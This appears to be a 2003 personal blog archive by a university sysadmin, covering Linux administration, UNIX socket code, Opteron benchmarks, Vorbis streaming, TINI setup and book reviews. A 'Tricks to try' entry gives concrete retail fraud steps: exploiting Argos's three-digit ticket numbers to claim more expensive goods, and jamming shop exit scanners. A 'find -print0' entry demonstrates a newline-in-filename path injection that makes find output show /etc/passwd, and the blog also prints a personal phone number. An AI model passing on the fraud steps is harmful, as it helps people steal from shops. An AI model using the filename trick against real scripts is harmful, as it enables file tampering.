    The BBC are reporting (lack of inet connection - no link at the moment) that Microsoft has `neutralised' the MS Blaster worm. What they have actually done is move the windowsupdate.com domain so that they don't get flooded off the face of the planet which would have been just reward.

    It's still crashing unpatched systems left right and centre because it's so badly written. Once again, the world has been saved by the abject cluelessness of black-hat-wannabe-kiddies.

    And from the world of less clueless coloured-hat people; the latest Phrack is out. Phrack is very much worth reading. It has a fair few wordz with too many z's on the end, but the actual content is of a very high quality. I certainly want to play with the ELFsh program.

    Oh, another item for the wish list, code that will take a dynamic ELF and make it static.

    And I guess there are a fair few computers on the Niagara Mohawk grid that haven't been patched yet .

    (I shouldn't smile about that actually. The UK has deregulated the grid recently too and investment has fallen to 0. Sure, prices are lower but people are asking where all that money came from yet.)

    Disk. Who needs that?

    tmpfs is a cool thing. You almost certainly have it built in if you're running a 2.[456] kernel. I have a box sitting in the DoC machine room that, at rc.sysinit time, copies a Gentoo stage3 into a tmpfs and chroots into it. It has no swap enabled so you can (and I did) pull the SCSI ribbon off the motherboard (live) and the machine doesn't even blink.

    It will be logging to the disk at some point and all those multilog and syslog-ng processes will drop into disk wait, but that shouldn't won't the main function of the box. My main worry is that syslog-ng creates /dev/log as a UNIX SOCK_STREAM (I have yet to test this) in which case some stuff that syslogs will lock up too.

    My code expects syslog to block and will carry on working (dropping log messages as needed), but I'm not sure about sshd and the like. The solution is to make /dev/log a SOCK_DGRAM in the syslog-ng source code I guess.

    I'm sure there was someth...

    I'm sure there was something important that I was ment to reply to today but I can't remember what. I expect it will blind-side me about 4pm tomorrow. These things usually do.

    IV was down over the weekend because the webserver died again. We have physically switched boxes for the webserver and it's having the exact same issues as the old one. Autofs is causing a kernel oops that then locks up VFS layer and after that the webserver is a little useless.

    The maintainer of the code in question (net/sunrpc) has had a look at the stack traces and can't see anything wrong so we are going to see if it happens again (with a 2.4.21 kernel) and start stripping out patches until we can reproduce it in a stock kernel. At that point we add debugging code to try and trap where the dodgy data structure is going dodgy. All on our primary webserver - wonderful.

    And...

    iptables -P INPUT DROP ; iptables -I INPUT -p tcp --destination-port=22 -j ACCEPT

    just made my server drop off the face of the net. That really should have been in one packet, damm you fragments.

    Oh, and train operating staff will be able to use swab kits to add people who spit at them to the UK DNA database. Charming.

    Misspent Youth

    [Amazon link] Frankly, I expected better from Hamilton and probably should have paid heed to the reviewers on Amazon. Hamilton writes some really good books; never hard core sci-fi, but good old fashioned page-turners.

    But the plot of this book reads like a low-budget porno script and the characters are uninteresting and unbelievable. I read to the end, but mainly because I had nothing else to do.

    Autofs

    DoC's primary web server (the server which you are getting this page from) has been failing a lot recently with autofs problems. At one point it died 3 times in as many hours so we switched to a different box and sat it on 146.169.1.10. That was ok for while until it died in the same place. I hope to get the opps output and have a look.

    But autofs (the userland part) is a little dodgy. It can get upset pretty easily with NFS mounts as can amd (the alternative, written by CSG at Imperial) is only a little better. Both are pretty huge programs for doing a simple task. I think I'll write a replacement over the weekend.

    UNIX tricks

    Little to most people know of UNIX domain sockets. They may only work on the localhost, but when local communication is all you need they offer a number of funky features.

    Firstly, you can find out who is connected to you:

    struct client *
    client_init (int socket)
    {
            struct  ucred creds;
            socklen_t creds_len = sizeof (creds);
            struct  passwd  *pwent;
    
            if (getsockopt (socket, SOL_SOCKET, SO_PEERCRED, &creds, &creds_len) == -1)
                    return NULL;
            if (creds_len != sizeof (struct ucred))
                    return NULL;
            pwent = getpwuid (creds.uid);
            if (!pwent) {
                    syslog_write (slog, LOG_WARNING, "Lookup in passwd for UID %d failed", creds.uid);
                    return NULL;
            }
    

    Secondly, you can pass file descriptors down them:

    // Transmits @new_sock over @dest_sock using SCM_RIGHTS
    int
    send_fd (int dest_sock, int new_sock) {
            struct msghdr   msg = {0};
            struct cmsghdr  *cmsg;
            char            buf[CMSG_SPACE (sizeof (new_sock))];
            int             *fdptr;
    
            msg.msg_control = buf;
            msg.msg_controllen = sizeof (buf);
            cmsg = CMSG_FIRSTHDR(&msg); 
            cmsg->cmsg_level = SOL_SOCKET;
            cmsg->cmsg_type = SCM_RIGHTS;
            cmsg->cmsg_len = CMSG_LEN(sizeof(int));
            fdptr = (int *)CMSG_DATA(cmsg);
            *fdptr = new_sock;
            // Sum of the length of all control messages in the buffer: 
            msg.msg_controllen = cmsg->cmsg_len;
            if (sendmsg (dest_sock, &msg, 0) == -1) {
                    fprintf (stderr, "Failed to write to child: %s\n", 
                                    strerror (errno));
                    return 10;
            }
    
            return 0;
    }
    
    // Reads a file descriptor from stdin using SCM_RIGHTS
    int
    get_fd ()
    {               
            char buf[CMSG_SPACE(sizeof (int))];
            struct msghdr msg;
            struct cmsghdr *cmsg;
            
            msg.msg_control = buf;
            msg.msg_controllen = sizeof (buf);
            msg.msg_name = NULL;
            msg.msg_iov = NULL;
            msg.msg_iovlen = 0;
            if (recvmsg (0, &msg, 0) != 0)
                    return -1;
            cmsg = CMSG_FIRSTHDR (&msg);
            if (cmsg->cmsg_type != SCM_RIGHTS) {
                    syslog_write (slog, LOG_ERR, "CMSG type was not SCM_RIGHTS");
                    return -1;
            }
            return *((int *) CMSG_DATA (cmsg));
    }
    

    The webserver is on it's ...

    The webserver is on it's last legs and will almost certainly die over the weekend. (Hint: never use Reiserfs).

    IV should still be on http://tweetypie.doc.ic.ac.uk/~agl02/ however. But if the primary server is down, how do you get that URL?

    Something to ponder..

    God, building packages fo...

    God, building packages for apache+php+mod_perl+kitchen sink is so painful. A million paths woven together into one huge diabolical ubermess. Sigh. I guess I'll get there in the end.

    Mail should be working ag...

    Mail should be working again.

    This article on 3d printing was linked to on slashdot. It's a pretty short and dull introduction, but it foreshadows another key battle on the copyright front. Personally, I think that Gilmore expressed it far better in this text. It's going to be a painful few decades while these changes sink in.

    sfdisk -s returned a negative number for me today caused by the 2TB limit on 32-bit sector counts. This seems like it's going to be a pretty painful transition as many utilies (even the kernel, until 2.6) have this limit. sfdisk, despite being in util-linux, is actually pretty badly written. It assumes in several places that sizeof (long) = 4. I might end up rewriting large parts of it because cyl/head/sectors have got to go.

    Hawk is not getting SMTP,...

    Hawk is not getting SMTP, so no email is getting through at the moment.

    Use agl02 AT doc.ic.ac.uk if need be.

    find -print0

    See, I don't understand what all this filesharing fuss is about. People put so much effort into Kazaa, Gnutella and other weirdly named stuff.

    All you need is a user running a buggy version of phpBB, a gigabaud link to the Internet and people will upload stuff to you! 84GB of stuff to be precise onto our primary fileserver. It says something about the systems at Imperial that this was such small fry that it didn't even register for a few days until they setup ftp servers and our webserver was a couple of places higher than normal on the list of hosts by outbound traffic.

    What's really amusing is watching the script kiddie's exploit. (Yes, we keep full packet logs of everything for a couple of weeks, so we just scanned back and selected that TCP stream). They connected and it's so obvious that they didn't have a clue. They were pasting commands in (multiple commands in 1 packet) and couldn't use grep. They would ls -lR to find somewhere to put their files and hit ^C after a while ... before doing it again and trying to hit ^C at the right place because it had gone off the top of the screen .

    (I would usually lock php right down to stop user level compromises like this. But it's a university and we are ment to give them pretty free run. And yes, the user web and db servers do get buggered silly on a fairly regular basis as scripts run amok.)

    I was explaining to someone the importance of using the -print0 argument to find when working in untrusted paths. Often the output of find is piped into a program like xargs using newlines to deliminate files. The -print0 (and -0 option to xargs) uses null bytes insted.

    Try this example:

    % python
    Python 2.2.3 (#1, Jul 12 2003, 15:30:57) 
    [GCC 3.2.3 20030422 (Gentoo Linux 1.4 3.2.3-r1, propolice)] on linux2
    Type "help", "copyright", "credits" or "license" for more information.
    >>> import os
    >>> os.mkdir ("foo\n"); os.mkdir ("foo\n/etc");
    >>> open ("foo\n/etc/passwd", "w+").close ()
    >>>
    % find
    .
    ./foo
    
    ./foo
    /etc
    ./foo
    /etc/passwd
    

    Opps! Where did /etc/passwd come from? Lets hope that that xargs wasn't doing anything nasty.

    Opteron Benchmarks

    These results are completely unfair and shouldn't be taken as gospel in any way. Lithium is the dual Operton (it's specs are in a previous post), lithium32 is Lithium running 32-bit code (Mandrake 9.1) and Loch is a dual 2.66Ghz Xeon with only 1GB of memory (Lithium has 4). Lithium only has an ATA disk, while Loch is LVD SCSI. I tried as much as possible to allow both systems to keep everything in buffer cache.

    Everything was run with GCC 3.3, but keep in mind that Lithium (in 64-bit mode) is actually building a slightly different kernel (x86-64, not i386).

    make 2.6.0-test1, default configure, no -j
    lithium:	4m33
    lithium32:	5m26
    loch:		5m41
    
    make 2.6.0-test1, after make clean, -j4
    lithium:	2m27
    lithium32:	2m48
    loch:		2m57
    
    make 2.6.0-test1, after make clean, -j8
    lithium:	2m28
    lithium32:	2m48
    loch:		3m08
    
    md5sum of 512M zero file (in buffer cache)
    lithium:	3.1s
    lithium32:	10.6s
    loch:		3.4s
    stimpy:		16.8s
    

    Stimpy is another Mandrake box because I didn't quite believe the result for Lithium in 32-bit mode. It seems that Mandrake 9.1's md5sum just sucks, so ignore lithium32's result in that.

    Gentoo AMD64

    This just makes my blood boil. I really shouldn't read these articles, I'm sure it's bad for my health or something . These idiots will always exist.

    Gentoo AMD64 lives! It takes quite a lot of trickery, but it's building KDE at the moment (heck, have to do something with all of those cpu cycles!). I might post a stage1 file at some point, but the semi-offical Gentoo amd64 stage1 files will be out soon. Mostly I did it for the experience.

    Who needs this filesystem malarkey anyway?

    You know, my home system didn't feel slow till I started using the dual Opteron system. Heck, even the dual Xeon-HT's don't feel as nippy and it's running 32-bit code.

    I posted a note to python-dev today about finding the size of types at configure time. Almost nothing except glibc, gcc and binutils works cleanly when cross compiling. GNU autoconf should mean that setting --host and --build makes everything work magically. Does it hell.

    (p.s. glibc 2.3.2 cannot be cross compiled, use 2.3.1. And both of these versions misdefine sscanf - you have to correct it in stdio-common/sscanf.c first.)

    One of the dumbest things in configure scripts is when they don't try tests because they can't run the compiled code (because it's x86-64 code). The script knows it's a cross and just gives up. In the case of Python it assumes that the sizes of int etc are for 32-bit. (Except for fpos_t, for which it's correct for an 8-bit system). But there's no reason to run compiled code to get this information.

    #include <asm/types.h>
    #include <sys/types.h>
    
    const   __u8    sizeof_int[sizeof(int)];

    And so on. Then compile the code and objdump -t sizeof.o | grep 'sizeof_[^ ]+$' | awk '{ print $5 " " $1; } will give you all the information. Works perfectly for native and cross compilers.

    DJB exchanged emails about his call for a disablenetwork() syscall. My point was basically that he was thinking about it the wrong way round. It shouldn't be a disablenetwork call, but a case of "I didn't explictly give you a network capability".

    I also remarked that if you were going to go a capability you could also chroot() everything and give it a UNIX domain socket via which it could make its filesystem calls. This would make restricting programs pretty simple as you have one point of access for all filesystem control. (It would be a UNIX domain socket because they can have file descriptors passed between processes over them).

    He suggested that few programs really need the filesystem (and would you look at the date on that?) and that it has more than security implications:

    A small interface (for example,
    a descriptor allowing read() or write()) supports many implementations
    (disk files; network connections; and all sorts of interesting programs
    via pipes), dramatically expanding the user's power to combine programs.
    A big interface (for example, a file descriptor that allows directory
    operations) naturally has far fewer implementations.

    Which is actually really cool. Most programs could do without the full fledged filesystem and it would be useful to be able to redirect their access down a pipe or socket. There are a number of problems with being able to do this that would probably need a kernel patch; mmaping for one and the problem of no being able to pass fds between machines.

    Just testing SVG

    Just testing...

    That should be 3 SVG circles if your browser can handle it. Hopefully nothing explodes too badly.

    If all the colours are wrong (it will look grey with lines going down it) then you're hitting a known bug in Mozilla. It's fixed in CVS.

    Opterons

    Woooo....

       
    	librt.so.1 => /lib64/librt.so.1 (0x0000002a9566d000)
    	libacl.so.1 => /lib64/libacl.so.1 (0x0000002a95785000)
    	libc.so.6 => /lib64/libc.so.6 (0x0000002a9588b000)
    	libpthread.so.0 => /lib64/libpthread.so.0 (0x0000002a95abb000)
    	libattr.so.1 => /lib64/libattr.so.1 (0x0000002a95bd7000)
    	/lib64/ld-linux-x86-64.so.2 => /lib64/ld-linux-x86-64.so.2 (0x0000002a95556000)

    Yes, that's a 30GB mmap...

    open("/dev/hda", O_RDONLY)              = 3
    mmap(NULL, 32212254720, PROT_READ, MAP_SHARED, 3, 0) = 0x2a9589d000
    
    processor       : 0
    vendor_id       : AuthenticAMD
    cpu family      : 15
    model           : 5
    model name      : AMD Opteron(tm) Processor 242
    stepping        : 1
    cpu MHz         : 1595.065
    cache size      : 1024 KB
    fpu             : yes
    fpu_exception   : yes
    cpuid level     : 1
    wp              : yes
    flags           : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext lm 3dnowext 3dnow
    bogomips        : 3178.49
    TLB size        : 1088 4K pages
    clflush size    : 64
    
    processor       : 1
    vendor_id       : AuthenticAMD
    cpu family      : 15
    model           : 5
    model name      : AMD Opteron(tm) Processor 242
    stepping        : 1
    cpu MHz         : 1595.065
    cache size      : 1024 KB
    fpu             : yes
    fpu_exception   : yes
    cpuid level     : 1
    wp              : yes
    flags           : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx mmxext lm 3dnowext 3dnow
    bogomips        : 3185.04
    TLB size        : 1088 4K pages
    clflush size    : 64
    

    Gentoo x86-64 hopefully comming soon...

    nfs-utils 1.0.3 and 1.0.4...

    nfs-utils 1.0.3 and 1.0.4 are buggy (1.0.4 is the one with the new xlog security patch). Use 1.0.1 and get the xlog patch from somewhere else and apply it manually.

    If you get a motherboard with a `3COM 3c940' builtin (it doesn't exist in a standalone from at the moment) the driver you need is actually an sk98. I have the patch handy if anyone ever needs it.

    Nuclear landmines (and no, it's not the Yanks again this time).

    HTML Through CSS

    nForce 2 chipsets

    The nForce2 chipset (from nVidia) is popular for AMD systems at the moment, just don't buy one if you're running Linux. nVidia supplies drivers from its website for the builtin network, gfx and audio (possibly others, I didn't get that far) as modules - more than slightly frustrating for a NFS root. Still, I managed to get the driver into the kernel (including the closed source binary part) and it half works - the sending half.

    The graphics part doesn't handle VESA DDC calls and seems to freeze completely with the nv driver.

    In short, avoid unless you like waiting for nVidia to drip feed you closed source drivers.

    Some people may have noticed that there's some documentation that has appeared in the CSG section in the site tree at the bottom. Since I haven't released the code you probably don't want to read it, but the interesting bit it that I just made up the tags. (If you see all the text stuck together then your browser doesn't like this - try Mozilla). Each of the functions looks a little like this:

    <function>
    	<name>function_name</name>
    	<args>
    		<arg><type>string</type><name>filename</name></arg>
    	</args>
    </function>

    And then I just define them in CSS:

    function { background: #f3f6fd; display: block; margin-bottom: 30px; }
    function > name { font-family: monospace; padding-bottom: 10px; display: block; color: #0000dd; }
    function > name:before { font-family: Georgia, Times, sans-serif; content: "Name: "; color: #000000; }
    function > args { display: block; margin-bottom: 10px; }
    function > args:before { content: "Arguments: "; }
    ...

    Mozilla renders it ok, Konqueror doesn't and I've not tried anything else. Is this in the slightest valid in XHTML? It certainly feels XMLish.

    And if it is valid, why isn't the XHTML standard just a common CSS stylesheet? I'm pretty sure can define every HTML tag in CSS.

    I should write more than ...

    I should write more than I'm going to this entry, maybe I'll write the rest later on tonight.

    But the main point is that my phone eloped with my modem and ran off to Nevada to get married over the weekend so:

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    My number, current as of 14/7/2003 is +44 (0)7906 332512
    
    AGL
    
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.2.2 (GNU/Linux)
    
    iD8DBQE/Ewm6zaVS3yy2PWARApCVAKCQZvbUIYdzf/ue5Cdl9r3WYGIeYQCgvRM3
    H4ki+BlNXHPm29KGiEF4A20=
    =jG6K
    -----END PGP SIGNATURE-----

    freenetproject.org nuked

    Ian's on holiday at the moment and I met up with him and Janie yesterday in south London. It's been too long since I saw them, but it's good to see that they're still together and doing well. Janie needs better shoes, but these things are fixable :)

    Unfortunately, they're also out of contact too. Their phone can't do incoming calls and I only have a vague idea of where they're staying. This would be fine except that Go Daddy nuked the freenetproject.org DNS (or possibly Ian renewed the domain too late) and it seems that only Ian can alter the account. This killed mail to imperialviolet.org too, but only briefly.

    Thankfully, the /. story about Freenet linked to the other name for the website. (And do read that story, it's really good; well done Ian).

    Bugger. While trying to g...

    Bugger. While trying to get gdm working for the new Dept of Computing base install it looks like I screwed up a fair amount of stuff. That includes email from last night until now (I don't think it would have bounced - it just got vapourised), IV, comments etc.

    So any important emails should be resent, please.

    Oh, and the answer was that calling exec in any startup script (which is common practice here to change shells) causes gdm to fail with a completely unhelpful error message. I think we might be using kdm now.

    BBC Vorbis Streaming

    Firstly, an email I sent to the BBC Online Services Support list today:

    Three sysadmins from Imperial College (http://www.doc.ic.ac.uk/csg),   
    myself included, are temporarily living in White City - just up the
    road from the main BBC complex. We would very much like to see the
    Ogg Vorbis streams of BBC Radio running again.
    
    The last entry on http://support.bbc.co.uk/ogg/ reads (in part)
    "we simply do not have time right now to get the ogg streams running again"
    With this in mind, we would like to offer our services to help with
    this project in any way.
    
    Is there any way that this is possible?

    Now, I'm almost certain that this will either generate a polite brush-off or will just be ignored. With this in mind, I've worked out how to do it myself:

    BBC Vorbis Streaming HOWTO

    Firstly, you need recent versions of libxml, libxslt, libvorbis and icecast2. The first three are pretty standard, but Icecast2 is only available from CVS snapshots. The modules you'll need are icecast, ices2 and libshout. libshout is required to build ices2.

    You'll also need RealPlayer for Linux, since this is the only source of BBC Radio data at the moment. You could just pipe a radio into the linein, but the quality of this is likely to be a bit crappy. Though it would get rid of the nasty time lag in BBC Real streams.

    We'll setup icecast in a minute, but we also need to download dsproxy. This traps data sent to /dev/dsp and outputs it as PCM data. Download and build dsproxy (needs root to insmod). I run devfs, so my /dev/dsp etc are just symlinks into /dev/sound/, so I can replace them at any time but realplay is going to need to see the dsproxy devices when it starts up. You could chroot RealPlayer and point the sound devices in the chroot to dsproxy, but I haven't played with that. At the moment I'm setting up the devices to start realplay and then switching them back to the OSS devices for normal usage. However you decide to do it, here are the device numbers:

    • OSS dsp: 14, 3
    • OSS mixer: 14, 0
    • dsproxy dsp: 121, 2
    • dsproxy mixer: 121, 3

    So, for the moment, create the dsproxy devices as /dev/dsp and /dev/mixer (cd /dev ; rm dsp mixer ; mknod dsp c 121 2 ; mknod mixer c 121 3). Now we are ready to start the reader and realplay, so we configure icecast.

    Icecast has two parts - the server and the source. The server is icecast, the source is ices2. My config for the icecast server is here. Note that the password is XYZ and it puts stuff in /tmp/icecast (you may need to create /tmp/icecast/[log|web|admin]). My config for ices2 is here. You may wish to have a look in the example configs as well to see the other options available.

    You should now be able to startup icecast (pass the -c option to specify the config file). In another terminal goto the dsproxy source directory and run ./reader -x -e -s | /path/to/ices-2.0-Beta2/src/ices /path/to/ices-2.0-Beta2/src/ices.xml.public. That should start the source up, it will log to the terminal. Now start realplay and run the Radio 4 stream (http://www.bbc.co.uk/radio4/realplayer/media/fmg2.rpm). You should be able to stream from http://testhost:8000/radio4.ogg.

    It's pretty rough still, but it's working for me at the moment.

    Altered Carbon

    I needed a book to read (had few days without a computer) and Altered Carbon seemed a good a choice as any and I'd recently read this /. review about it.

    This book isn't going to be as influential as the /. reviewer thinks. As far as sci-fi goes it's mediocre. It's set in the future, rather than being an exploration of it. People in this world have the ability to digitise their minds and switch bodies as market forces allow. But this just provides a few neat plot hooks - it isn't an Egan like world here.

    What this book does give is a really good detective story. Not a culture changing item, but excellent crime-sci-fiction.

    The end of term involed t...

    The end of term involed the Union Summer Beach Party. Not quite sure about that name, there wasn't much beach involed. It did invole several days of setting up with miles of cables going round the quad. The photos are here. It looked pretty stunning and everyone seemed to have a good time. I'm afraid, however, that after working 14 hours on Thurs and 16 on Friday I went to sleep about 1am Saturday morning, leaving the rest of the crew to strike the fixtures. In my defence, I did have to be up at 7 to pack!.

    Some pics of the photos

    Defending C++

    Ian:

    Don't bother telling me that Freenet should be implemented in C++ unless you are willing to spend months illustrating your code on stretched leather with a carefully prepared pheasant feather while paying particular attention to the initial "#".

    Well, I did do this and here's why:

    • I wanted to learn C++
    • The Java Freenet code was making mistakes in areas such as crypto that only an independent implementation was going to uncover
    • I don't like Java

    I learnt C++ pretty well and it really is a messy pre-processor for C. There are hundreds of tiny quirks waiting to bite you, not just in the language, but with each different compiler (looking at Microsoft here). It's a mess and really shouldn't be used for anything, but it still is. And that's not just because the great unwashed masses haven't learnt about Java.

    C++ is popular because it's actually a good tool for a lot of jobs - still riding C's wave from the 1970's. Interfaces are written for it and with it in mind and some people have done jaw-dropping stuff with such a mess of a language.

    (I've never used C# - and I'm in no position to comment on it directly. I'm just using the general opinion that, in language space, C# is standing on Java's toes.)

    But that certainly doesn't mean that everyone would be using Java and C# if C++ didn't have so much momentum. Despite great improvements, Java code is still just slow. Even on fast machines you can feel the lethargy of Java GUI programs. No amount of micro-benchmarks change this. And the Java library isn't just "artistically uninspired", it's cringe worthy - huge class names everywhere and interfaces designed by committee. At least C/C++ interfaces are generally short and to the point.

    To some extent Ian is correct, however, that Java is more of an engineering language than an artists language. Java does manage to give programming idiots a language which they can use in a big organisation without giving them sharp objects to poke themselves with (e.g. pointers).

    But if you are going to get away from C's perfectionism then I would suggest that Python is a far better place to be. Python for the times that you want brush strokes with C modules for the awkward details. Java/C# is to thin to cover with and too thick to touch up with.

    Usually I shrug off a col...

    Usually I shrug off a cold in a few hours but, right now, everytime I sneeze it feels like most of my throat is ripped out and I think my brain is trying to crawl out my left ear.

    But anyway - X auto-configuration is quite painful. The basics (finding video cards) is pretty trivial, but how do you find the model name of the LCD connected? (possible) and how do you do that for each of a number of different video cards on the same PCI bus, each with multiple heads? From what I can see VESA just wasn't designed to handle multiple cards.

    On the same project, how do you get a BIOS device number from a devfs name? Going from devfs => classical /dev just involves walking /dev/discs but, as far as I can see, there is no mapping to BIOS device numbers (needed for GRUB). For example, my kernel loads my SCSI MegaRAID before my Adaptec SCSI - but my BIOS does it the other way round. Aggh!

    Ian seems set on making up for lost blogging time with a flurry of interesting posts. I'm sure he can't keep it up for long, so enjoy while it lasts.

    Looking in my bookmarks:

    Smyle Productions: Googlebomb

    Smyle Productions <- attempt to Googlebomb the company that did the Imperial Summer Ball. Unfortunately I don't have any photos from it (yet).

    This is from a nameless p...

    This is from a nameless person (not a student, however) in the Dept of Computing

    my main computer has been disconnetted and Catherine Wang's hard-disk and keyboard connected to my screen.

    I so wanted to ask her for a PS2+IDE to VGA wiring diagram.

    I'm glad that Ian liked...

    I'm glad that Ian liked Equilibrium. Someone pointed this film out to me a couple of months ago and I argee this it's pretty fantastic. It's interresting what difference a marketing budget can do; in my opinion this film is better than The Matrix.

    There's very little new in it - pretty much everything comes straight from 1984, Fahrenheit 451 or The Matrix, but you know what? It doesn't really matter because they've taken the good parts.

    O'Reilly 25th

    This year is the 25th anniversary of O'Reilly as a company. To celibrate O'Reilly had a boat party going down the Thames (the river that runs through London).

    I wouldn't wish to pick out a few names from the numbers there so I'm not going to. But there were over a hundred authors, editors and members of the UK Linux/Open Source community there as well as the guest of honour, Mr O'Reilly himself (who was about 45 minutes late .

    Free food, free bar, interesting people - what more could you want? I had a great time.

    Read this if, and only if...

    Read this if, and only if, you have seen the Matrix Reloaded already.

    Ian has updated his blog with quite a long entry. Here's a reply I sent via email:

    Whisper: Do you pad messages? I'm sure you have considered that the IRC backend
    still allows for traffic analysis, but I'm not sure how useful traffic
    analysis is in IRC style conversations.
    
    I've not played with C# much, but I don't think I would use it out of choice
    from what I've read about it. Any particular reason you choice it over
    Java for this? 
    
    WebQuest: Not a new idea - but you would be the first if you actually got it
    to work nicly. The whole trick here is that it will get spammed to hell as soon
    as it becomes popular. You don't mention how you act against this.
    
    Using Google as a backend and tweaking the search query is a nice trick.
    
    "Collaborative Filtering" of course springs to mind and a trust web could solve
    your spamming problem at the cost of bootstrapping problems (you need people to
    form a trust web, but people are going to bother unless there are already people
    doing it).
    
    Kanzi: Shame it didn't work out as shareware - but I'm glad to see it going Open
    Source (at some point).
    

    Systrace timing tests:Tes...

    Systrace timing tests:

    TestNormalWith Systrace
    getuid0.8711.38
    getpid0.8711.38
    stat0.8711.38

    All 3 tests did a million calls of their respective syscalls. The first two were setup in systrace to allow everything. The filesystem test was setup to allow only if a regexp matched.

    Conclusion: the overhead is pretty much fixed - and not really that huge unless you are really syscall dependant.

    Tricks to try

    Go into Argos, buy something really cheap and leave. Wait (possible several days) for the ticketing system to wrap round (it's only 3 digits) and go and claim an (almost certainly) more expensive item with the same number (they never check the description, which is in a much smaller font). For bonus points, have a friend get the duplicate ticket and walk off with 2 of the expensive item after the friend complains that his never arrived.

    Get a transmitter that triggers those resonance scanners that shops have at the exits (or just stick a tag on one, if you can). Wait for them to get so upset that they turn them off. (they are pretty much the only security in most shops). For bonus points get a transmitter powerful enough to trigger a whole shopping center.

    Snippets

    Something that I really should have known before:

    for x in `cat file`

    ... will tokenise file but

    cat file | while read x

    ... will do line-by-line processing, which is often what you actually want.

    Systrace and SELinux

    I installed a system with systrace and SELinux, but I haven't had time to play about with them much yet. SELinux, from first looks, seems very complex - probably too complex for most uses. Systrace, however, is small and sweet. I've not looked at how it's implemented yet, but I suspect it might have quite a system call overhead, however. Will have to benchmark it.

    Saw Chicane live and he/they performed quite a lot of their new album which was very impressive. It was their old stuff which got the crowd going though. 16 18" drivers in a small venue hitting resonance is quite awe-ful*.

    * - that's awe-ful not awful - which is defined as meaning what awful used to mean.

    Coming up this week is O'Reilly's 25th anniversary (possibly just O'Reilly UK's 25 actually, now I come to think about it) and I get a free boat trip on Thursday to celebrate.

    The Hardened Gentoo proje...

    The Hardened Gentoo project has put a box on the net with a public root password. It's running SELinux and, even with root access, it should be secure. Go give it a try if you like.

    I'm building it at the moment to give it a play tomorrow.

    Everyone is tidying up li...

    Everyone is tidying up like mad around here because the Rector (head of the college) is visiting on Monday. We're showing off like never before (and have more funky, massive LCD screens than one can shake a stick at) so we're taking some pretty pictures to put on some SunRays (thin clients).

    Dave is a little shaky with the camera, but...

    and (if I keep it running over the weekend) pretty graphs!

    Been busy listening to, t...

    Been busy listening to, taking part in, filming for and going to the concert of.

    London feels like Los Ang...

    London feels like Los Angeles at the moment. Unfortunately it feels like the really hot inland areas of LA and not the constant-temperature-24-hours-a-day-with-sea-breeze bliss that is Santa Monica. The AirCon units in the dept are starting to fail.

    But I'm afraid, Ian&Janie, that it isn't going to last. This is England, which means it's really going to piss down soon.

    TINI Stuff

    Here's a writeup of my notes on setting up TINIs

    Setting Up TINIs

    Loading Firmware

    TINIs come with no firmware loaded and the first order of the day is to fix this. Even if your TINI has fireware loaded you may still wish to reload at as a method of extreme reset.

    Firstly, grab version 1.02e of the SDK. Version 1.02f came out between my experiementing with the TINIs and writing this, so if you have problems you may wish to try it.

    The SDK is written in Java and uses the Java Serial Port API to talk to the TINI. JDKs on Linux don't support this API so you either need to use a Windows box or (as I do) install RXTX. I'm using version 1.4 of RXTX. Follow the install instructions that come with RXTX (you need root for this). You also need to chgrp csg /var/lock (assuming you are going to run the SDK as a non-root member of group csg).

    Now make sure that the TINI is wired up correctly. You should be supplying 7.5V DC into the power socket. The TINI docs say 5V, but it seems that the voltage regulator needs quite a bit of power. The polarity doesn't seem to matter.

    You should also have a straight through serial cable running into the female serial port of the TINI (labled J6). In the end, I got fed up with wondering if the cable was actually correct and plugged the TINI into the back of the computer.

    (from this point on, this information is in the TINI book)

    Now try firing up the fireware app:

    • cd tini1.02e/bin
    • java -classpath `pwd`/tini.jar -noverify JavaKit

    Select a comm port (if you don't see any, your RXTX install isn't correct) and click "Open Port". Now click "Reset". You should see the TINI talking to you. If you don't then try the other serial port and then look at the wiring carefully.

    From the File menu, load tini.tbin followed by slush.tbin from the tini1.02e/bin directory. This will take a little time over the serial cable.

    Now, in the SDK terminal window type these commands exactly, each followed by Enter:

    • BANK 18
    • FILL 0
    • EXIT

    The TINI should now boot. The default root password is tini

    TINI Networking

    Once you have a root console on the TINI you probably wish to delete the guest user with userdel. You can then setup networking with ipconfig -d (uses DHCP). The ipconfig -C will save the setup to Flash memory for when you reboot.

    TINI Programming

    General

    The TINIs have a small java virtual machine and can run java class files so long as they only use the supported subset of the libraries. TINIs only support Java 1.1 code and then, only if it has been specially premangled.

    Building .tini Files

    Firstly you need to build the class files for each .java file you have

    • javac -target 1.1 -classpath /tini1.02e/bin/tiniclasses.jar File.java

    Once all the .class files have been compiled, put them in a directory and run the premangler on them:

    • java -classpath /tini1.02e/bin/tini.jar TINIConvertor -f directory -d tini.db -o HelloWorld.tini

    See the 1-Wire chapter in the TINI book for details of the actual java. The driver for the temperature sensors had to be dug up using Google. It's called OneWireContainer10.java and I should have a copy if it's needed

    Ok, so it's been too long...

    Ok, so it's been too long since I updated this. This is the most interresting thing I've read in a while [via lambda]. For any Postgres admin's out there this script that/which I wrote is a better replacement for pg_dumpall (you'll need PyGreSQL).

    Incidently, Python disttools bdist_rpm is very useful and cool.

    Local record store was holding a closing down sale and the Fellowship of the Rings soundtrack was one of the things I brought. I never realised that the choral work was done by Enya. It's a really good soundtrack.

    That's all I can think of for the moment.

    SysOps in Iraq

    I'll get round to describing my current project at some point. It's neat, but nothing very exciting. (it will have some useful Twisted Python snippets thou).

    In perhaps the most impressive display of War Against Drugs cluefulness so far the UK govt's latest drugs site is actually half correct. See their page on LSD - I wouldn't really disagree with any of that.

    Of course, it's not Erowid, but it's a big step in the right direction.

    Yesterday, O'Reilly sent ...

    Yesterday, O'Reilly sent me a note about their OpenBook project. More or less, they are reverting to "Founder's Copyright" where copyright only lasts 14 years (with an optional extention of another 14). After this time, O'Reilly release the book (on that website) under a Creative Commons license.

    The options to O'Reilly author's (i.e. myself) are 1) To agree 2) To decline 3) To take a 3 month option to find another publisher after 14 years, otherwise it goes free. (Guess which I chose).

    I'm really impressed that O'Reilly are doing this. Sure, computer books aren't going to be making much money after 14 years but even so, it's a damm good point of principle.

    How the heck, 3 weeks int...

